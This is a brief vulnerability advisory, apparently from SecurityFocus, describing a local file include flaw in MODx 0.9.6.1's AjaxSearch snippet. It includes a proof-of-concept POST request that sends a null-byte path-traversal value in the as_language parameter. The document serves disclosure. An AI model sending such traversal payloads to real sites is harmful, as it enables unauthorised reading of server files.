MODx 'AjaxSearch.php' Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following proof of concept is available:

Method=POST
Action=http://www.example.com/modx-0.9.6.1/index-ajax.php?
Name=as_language Value=../ajaxSearch_readme.txt%00
Name=q Value=assets/snippets/AjaxSearch/AjaxSearch.php


 

Privacy Statement
Copyright 2010, SecurityFocus